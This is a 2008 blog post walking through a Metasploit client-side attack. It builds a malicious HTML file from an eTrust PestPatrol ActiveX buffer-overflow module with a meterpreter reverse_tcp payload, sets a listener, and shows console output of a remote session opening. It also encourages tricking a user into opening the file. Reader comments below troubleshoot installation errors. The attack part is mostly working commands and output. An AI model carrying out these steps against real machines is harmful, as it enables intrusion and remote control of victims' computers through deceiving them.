Saturday, August 23, 2008

Metasploit and File Format Bugs


Client-side attacks are where its at and being able to send a legitimate looking file to a user to do their double-clicky thing on is the bomb.

MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.

Here is the link the fileformat mixin
http://www.metasploit.com/users/mc/rand/fileformat.rb

To use it, you need to add:

require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb

and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory

Now remembering my previous post on adding exploits to metasploit we can do the same for mixins.

so my exploit.rb file actually said:

require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'

And don't worry, if you jacked something up Metasploit will let you know.

cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)


For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb


From the description in the module:

This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info


Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$

Platform: Windows

Privileged: No

License: Metasploit Framework License


Provided by:
MC


Available targets:

Id Name

-- ----

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME MSF no The file name.


Payload information:

Space: 1024

Avoid: 1 characters


Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When

sending an overly long string to the Initialize() property of

ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary

code. This control is not marked safe for scripting, so choose your

attack vector accordingly.


References:

http://www.w00t-shell.net/#

http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options


Module options:


Name Current Setting Required Description
---- --------------- -------- -----------

FILENAME MSF no The file name.

Exploit target:

Id Name

-- ----

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7


msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html

msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(etrust_pestscan) > set LHOST 192.168.0.101

LHOST => 192.168.0.101

msf exploit(etrust_pestscan) > show options


Module options:


Name Current Setting Required Description

---- --------------- -------- -----------

FILENAME DEMO.html no The file name.


Payload options (windows/meterpreter/reverse_tcp):


Name Current Setting Required Description

---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process

LHOST 192.168.0.101 yes The local address

LPORT 4444 yes The local port


Exploit target:

Id Name

-- ----

0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7


msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler

[*] Creating HTML file ...

[*] File is located in ./data/exploits/ ...

msf exploit(etrust_pestscan) >


Fileformat bugs are going to you to require to run the multi/handler so you can catch the return shells.

cg@WPAD:~/evil/msf3$ ./msfcli

Usage: ./msfcli [mode]

====================================================

Mode Description

---- -----------

(H)elp You're looking at it baby!

(S)ummary Show information about this module

(O)ptions Show available options for this module

(A)dvanced Show available advanced options for this module

(I)DS Evasion Show available ids evasion options for this module

(P)ayloads Show available payloads for this module

(T)argets Show available targets for this exploit module

(AC)tions Show available actions for this auxiliary module

(C)heck Run the check routine of the selected module

(E)xecute Execute the selected module


cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E

[*] Started reverse handler

[*] Starting the payload handler...


***Work your magic to get the client to open the html file***

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)

[*] Sending stage (2650 bytes)

[*] Sleeping before handling stage...

[*] Uploading DLL (73227 bytes)...

[*] Upload completed.

[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)


meterpreter >

CG

8 comments:

Unknown said...

hi,cg!happy new year to you!!
when after addedd require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb,then metasploit can not startup,ple help me!

CG said...

can you paste what errors you are getting?

Unknown said...

i have find a solution!thx

Unknown said...

hi!cg!thank your quickly response very much!!i have find a solution from youe website!

Anonymous said...

Hello guys,

I have the same problem. msfconcole won't start anymore after adding the "require" line in exploit.rb

I'm using Backtrack 3 and metasploit 3.2.
I'm not familiar with ruby. Can you help me ?

bt framework-3.2 # ./msfconsole
/pentest/exploits/framework-3.2/lib/msf/core/exploit/fileformat.rb:3: uninitialized constant Msf::Exploit (NameError)
from /pentest/exploits/framework-3.2/lib/msf/core/exploit.rb:1:in `require'
from /pentest/exploits/framework-3.2/lib/msf/core/exploit.rb:1
from /pentest/exploits/framework-3.2/lib/msf/core.rb:48:in `require'
from /pentest/exploits/framework-3.2/lib/msf/core.rb:48
from /pentest/exploits/framework-3.2/lib/msf/ui/console/driver.rb:1:in `require'
from /pentest/exploits/framework-3.2/lib/msf/ui/console/driver.rb:1
from /pentest/exploits/framework-3.2/lib/msf/ui/console.rb:10:in `require'
from /pentest/exploits/framework-3.2/lib/msf/ui/console.rb:10
from /pentest/exploits/framework-3.2/lib/msf/ui.rb:10:in `require'
from /pentest/exploits/framework-3.2/lib/msf/ui.rb:10
from ./msfconsole:12:in `require'
from ./msfconsole:12


Best regards,
Jerome (email: marc@wallaby.be)

CG said...

did you install the actual mixin?

Anonymous said...

Hello everyone,

After a tiny mail from Chris, my problem has been fixed by using msf 3.3dev. Thank you Chris !

Regards,
Jerome

Anonymous said...

hi, i try to install adobe_utilprintf.rb exploit in metasploit 3.2. I open .msf3/modules folder and create exploits\windows\fileformat path. Inside fileformat folder i save the adobe_utilprintf.rb file. Then i edit exploit.rb and add after the require 'msf/core' line the command
require 'msf/core/exploit/fileformat'. I add the fileformat.rb file in msf32\lib\msf\core\exploit folder. when i run i get the following error:
C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/core/exploit/fi
leformat.rb:3: uninitialized constant Msf::Exploit (NameError)
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/co
re/exploit.rb:2:in `require'
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/co
re/exploit.rb:2
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/co
re.rb:48:in `require'
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/co
re.rb:48
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/ba
se.rb:19:in `require'
from C:/Documents and Settings/Giorgos/Application Data/msf32/lib/msf/ba
se.rb:19
from C:\Documents and Settings\Giorgos\Application Data/msf32/msfgui:11:
in `require'
from C:\Documents and Settings\Giorgos\Application Data/msf32/msfgui:11
from C:/Program Files/Metasploit/Framework3/bin/launcher.rb:97:in `load'

from C:/Program Files/Metasploit/Framework3/bin/launcher.rb:97

and metasploit doesn't load. How can i fix this?